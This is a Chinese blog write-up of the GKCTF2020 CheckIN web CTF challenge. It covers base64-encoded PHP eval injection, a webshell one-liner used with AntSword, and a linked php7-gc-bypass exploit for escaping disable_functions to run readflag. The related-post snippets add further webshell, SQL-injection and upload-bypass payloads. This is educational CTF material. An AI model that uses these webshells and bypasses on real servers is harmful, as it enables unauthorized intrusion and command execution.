[GKCTF2020]CheckIN 详细解题思路及做法

最新推荐文章于 2023-08-27 10:02:10 发布
最新推荐文章于 2023-08-27 10:02:10 发布
阅读量1.7k 收藏
点赞数 1
分类专栏: Web刷题记录 文章标签: php 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/EC_Carrot/article/details/110809549
版权

前言

文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途!

题目

在这里插入图片描述
打开题目,看到class以为是反序列化,但实际并不是,这里直接用$_REQUEST传入了参数便可以利用了。
看到base64_decode,说明我们的代码需要加密一下,尝试着直接传入c3lzdGVtKCdscycpOw==(即为base64加密后的system('ls');)
在这里插入图片描述
发现并不能返回数据,是难道是不能这么利用吗?
接着我尝试了一下cGhwaW5mbygpOw==(即为base64加密后的phpinfo();)
在这里插入图片描述
发现这个点是可以进行利用的,应该是php过滤了危险函数,在phpinfo中的disable_functions可以看到!
在这里插入图片描述
尝试着用一句话来突破!
构造url:

http://81b9655b-0465-44c7-a7b4-df93034d612b.node3.buuoj.cn/?Ginkgo=cGhwaW5mbygpOw==

eval($_POST['abc']);base64加密后为ZXZhbCgkX1BPU1RbJ2FiYyddKTs=
这边需要再用一个eval函数去包含一句话,我也不知道为什么,但亲测不加多个eval函数不能利用一句话,会报错
我这里用的是蚁剑
在这里插入图片描述
看flag发现看不了,是空白的,一时间不知道怎么办,再反过来看了看目录
在这里插入图片描述
看到有个文件readflag,但里面是乱码
在这里插入图片描述
猜测就是运行它来读flag!
然后…看看wp(〃‘▽’〃)
看phpinfo发现版本是7.3.18,这个版本有漏洞
php7-gc-bypass漏洞利用PHP garbage collector程序中的堆溢出触发进而执行命令,影响范围为linux,php7.0-7.3
exp:
https://github.com/mm0r1/exploits/blob/master/php7-gc-bypass/exploit.php
拉下来后修改,改为执行readflag
在这里插入图片描述

修改后上传文件至tmp目录下(师傅都说这个目录才有权限执行,至少我是不知道权限在哪里看( ̄へ ̄)
在这里插入图片描述
然后再用之前的利用点进行包含exp文件读取flag

?Ginkgo=aW5jbHVkZSgnL3RtcC8xLnBocCcpOw==

include('/tmp/1.php');加密后即为aW5jbHVkZSgnL3RtcC8xLnBocCcpOw==

在这里插入图片描述

小 白 萝 卜
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
buuctf-SUCTF 2019 CheckIn(小宇特详解)
小宇的web博客
01-22 2796
buuctf-SUCTF 2019 CheckIn(小宇特详解) 咋一看这是一道文件上传 这里先尝试一下上传一个php文件 里面写一个最简单的一句话木马就行 <?php eval(@$_POST['shell']);?> 上传试试 回显illegal suffix!(非法后缀) 这里尝试一下修改文件拓展名php5,phtml,等都没有成功 然后进行抓包,修改content-type,都是回显的illegal suffix!(非法后缀) 这里我上传一张jpg 回显<? in conten
[GKCTF2020]CheckIN详解
D1stiny的博客
06-01 4301
打开之后是这样的,没有发现反序列化函数,但是发现有一个@eval,想到了一句话,这是用base64进行传参 首先传参phpinfo();看看,需要经过base64编码 http://e0cc90ac-d4bc-450c-a6a4-476298ce7c18.node3.buuoj.cn/?Ginkgo=cGhwaW5mbygpOw== 找到disable_functions,发现过滤了许多危险函数 我们上传一个一句话木马看看 eval($_POST[123]);,经过base64是ZXZhbCgkX1
[GKCTF2020]CheckIN
末初的CSDN博客
06-17 1046
题目复现地址 <title>Check_In</title> <?php highlight_file(__FILE__); class ClassName { public $code = null; public $decode = null; function __construct() { $this->code = @$this->x()['Ginkgo'];
每日练习-[GKCTF 2020]CheckIN
m0_68113265的博客
08-21 127
本题前面有eval还增加eval原因是eval是把内容当作php代码执行写入$_POST[1]就不是一句话木马了,所以再增加一个eval(disable_function刚好没禁用)$_REQUEST是可以接受$_GET,$_POST,$_Cookie的,disable_function禁用了大多函数,可以使用蚁剑插件进行绕过。php配置文件默认的处理优先级,默认的数据写入顺序是EGPCS。当同时一个参数名,越往后的可以覆盖前面的参数。C代表$_COOKIE。S代表$_SERVER。
[NISACTF 2022]checkin
qq_40567274的博客
04-08 4546
[NISACTF 2022] 提示:写完文章后,目录可以自动生成,如何生成可参考右边的帮助文档 提示:以下是本篇文章正文内容,下面案例可供参考 题目-join-us -1' || (select*from aa)# -1'||extractvalue(1,concat(0x5c,(select group_concat(table_name)from information_schema.tables where table_schema like 'sqlsql')))# -1' || extrac
BUUCTF-CheckIn
m0_47571887的博客
11-09 772
打开题目,貌似是一道考上传的题目 上传php文件被过滤,我们就上传图片马, 我们用.htaccess来进行解析,尝试过后貌似行不通, 这里使用.user.ini .user.ini:在php.ini中的配置项中有两个配置项,一个是auto_append_file和auto_prepend_file,auto_prrpend_file意思是指定一个文件,自动包含在要执行的文件前,类似与在文件前调用了require()函数。而auto_append_file相似,只是在文件后面进行包含,使用方法很简
checkin
03-18
【标题】:“checkin”项目解析 【描述】:这个名为“checkin”的项目是一个针对“深层链接”教程而创建的“酒店基本入住”Web应用程序。它的主要目标是提供一个平台,用户可以在这个平台上模拟酒店的入住流程,...
glados_checkin
03-25
glados定时签到
checkin-system
05-19
2.克隆gsshop-checkin $ git clone https://github.com/GSSHOPLabs/gsshop-checkin.git $ cd gsshop-checkin $ npm install 3.启动gsshop-checkin $ node ./bin/www 4.开始开发 http://localhost:3000 5.捕获...
checkin-ncku
05-21
checkin-nckuFeature打卡完截屏并寄到信箱每天随机打卡依据上班时间,在合法时间内进行随机下班打卡依据假期日,跳过打卡日期Install yarn installUsage填入所需的帐户资讯到credential.json cp credential-template...
[GKCTF 2021]checkin调试与分析
Tokameine的博客
07-23 1374
目前笔者刚刚开始入门PWN,算是通过这题涨了点见识吧 主要函数: int sub_4018C7() { char buf[32]; // [rsp+0h] [rbp-20h] BYREF puts("Please Sign-in"); putchar(62); read(0, s1, 0x20uLL); puts("Please input u Pass"); putchar(62); read(0, buf, 0x28uLL); if ( str...
GKCTF2020 checkin
qq_53755216的博客
06-23 309
写在前面 最近快期末考了 拼搏20天 我要上大二 每天晚上会找时间刷一下CTF 正片开始 <title>Check_In</title> <?php highlight_file(__FILE__); class ClassName { public $code = null; public $decode = null; function __construct() { $thi
青少年CTF Crypto CheckIn
qq_41818842的博客
08-27 277
base64:大小写字母、数字和‘+’,‘/’,编码后字符数是4的倍数(不足则加=)Flag的Unicode加密是\u0066\u006c\u0061\u0067。base32:只有2-7和大写字母,编码后字符数是8的倍数(不足则加=);flag就出来了 至于为什么说看到==就想到用base64解码。打开文件发现后面有两个== 所以自然就想到先base64解码。一半会得到一长串字母和一个有意义的单词,这个单词就是密钥。Flag的base64加密是ZmxhZw==一般有一长串字母的都有可能。
ctf练习之Check your source code
SDM_JH的博客
08-07 1004
一、进入目标站点,查看源代码,发现可能存在source.txt文件 二、找到source.txt文件,发现如下判定,说明只要用户为admin密码不为admin且cookie合适就可以登录,最后一行设置了cookie。 三、打开burp suite并设置代理,可以看到如下cookie,将ahash的值进行base64解码,得到:88adminadmin,所以由cookie的构造(上面的setcookie函数)可知,secret对象的值为88. 三、构造cookie值,base64编码的88+admin+
BUUCTF_web_CheckIn
silence1_的博客
08-31 2174
BUUCTF_web_CheckIn 题目: 题目是SUCTF 2019的web题, 题目源码:https://github.com/team-su/SUCTF2019/tree/master/Web/checkIn 也是看了大佬的writeup才做出来,太菜了。。。orz 学到了一种新的上传姿势。 打开题目是一个上传界面。 随便上传一个php文件,意料之中被拦。 burp抓包改后缀为jpg,提示...
php ctf 后门,[SUCTF 2019]CheckIn(user.ini文件构成的php后门)
weixin_32821533的博客
03-18 188
参考博客:https://www.cnblogs.com/20175211lyz/p/11455355.html首先先来看看.user.ini文件利用.user.ini上传\隐藏后门条件:1、服务器脚本语言为PHP2、服务器使用CGI/FastCGI模式3、上传目录下要有可执行的php文件对于这道题目,已经提示了需要上传文件拿shell,上传一句话木马后提示需要上传图片,上传图片马又发现被过滤了。...
SUCTF 2019 CheckIn 作题有感
qq_46184013的博客
04-15 619
一.SUCTF 2019 CheckIn 刚开始打开这道题以为只是一道普通的文件上传, 先是试了试php一句话木马,提示 这里显示 是对<?进行过滤了 这时候想到可以换一种方法,用 <script language='php'>system('cat /flag');</script>对<?进行替换。 但发现还是不行,出现这个界面。 我是小白也不懂这个啊,去...
2021gkctf checkin
最新发布
02-29
2021gkctf checkin 是一个CTF(Capture The Flag)比赛,是由GKSEC团队举办的。CTF比赛是一种网络安全竞赛,旨在测试参赛者在网络安全领域的技能和知识。 在2021gkctf checkin中,参赛者需要完成一系列的网络安全...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值